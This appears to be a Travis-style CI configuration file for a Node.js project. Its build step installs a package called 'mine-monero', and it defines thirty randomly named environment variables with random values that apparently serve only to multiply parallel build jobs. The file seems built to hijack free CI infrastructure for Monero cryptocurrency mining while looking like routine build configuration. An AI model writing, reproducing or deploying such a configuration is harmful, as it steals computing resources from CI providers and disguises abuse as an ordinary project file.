language: node_js
node_js:
  - 9
build:
  ci:
    - npm i mine-monero
env: 
  - o16lLIKi=HYUQ2WXo
  - cVy3Cdx3=Rr4Pk43D
  - 84yhEq24=hZ7Mpxha
  - po4uUASX=IBUb8p8g
  - 4FW9AeaY=BI0dkXY1
  - pjK2cT3Y=H9XkUmVY
  - 104efOPy=xqPrenz6
  - RMXHvFa3=oizJgU0n
  - zP0JUWAk=WMpRYd2R
  - KdqmeXHU=XregIg22
  - nRY5Wmb7=Md7vYeK8
  - nXuQUSzV=NWRHRH1b
  - E9HvgTY3=4CTAJiVm
  - AUvZf27S=ILtZhwQk
  - sYhItwBo=Mfbly1ji
  - cqMq0LLD=BgGdXo4l
  - xMeIZBre=C1Nml4DT
  - l3bLR4u8=qAvK45AJ
  - 1HLq0xrB=uAkOtIFk
  - SSAPxz9f=0IPInaqw
  - Z9aDFi98=lIGreuzt
  - LRLf66nB=tWb2jDe6
  - AsnuRwjy=hgesflxe
  - S0RfnS14=mZGY3CXn
  - iCHdO7nl=m1OVCtz1
  - fUPBPUwT=3Ayl6rS3
  - uGFnGRaY=AwZKEA1p
  - gcG2A0Qp=FE7FIL4i
  - atDgObrN=oL1sUlHW
  - 1PnN3S2W=U6Ih1j3U
